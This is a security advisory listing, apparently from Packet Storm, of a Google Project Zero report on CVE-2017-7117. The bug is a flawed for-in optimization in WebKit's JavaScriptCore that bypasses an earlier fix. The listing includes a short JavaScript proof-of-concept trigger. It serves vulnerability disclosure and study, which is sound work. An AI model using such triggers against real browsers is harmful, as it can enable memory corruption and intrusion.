WebKit JSC Incorrect Optimization

2017-10-03T00:00:00
ID PACKETSTORM:144496
Type packetstorm
Reporter Google Security Research
Modified 2017-10-03T00:00:00

Description

                                        
                                            `WebKit: JSC: Incorrect for-in optimization #2  
  
CVE-2017-7117  
  
  
The following PoC bypasses the fix for the https://bugs.chromium.org/p/project-zero/issues/detail?id=1263 WebKit: JSC: Incorrect optimization in BytecodeGenerator::emitGetByVal  
  
PoC:  
function f() {  
let o = {};  
for (let i in {xx: 0}) {  
for (i of [0]) {  
  
}  
  
print(o[i]);  
}  
}  
  
f();  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`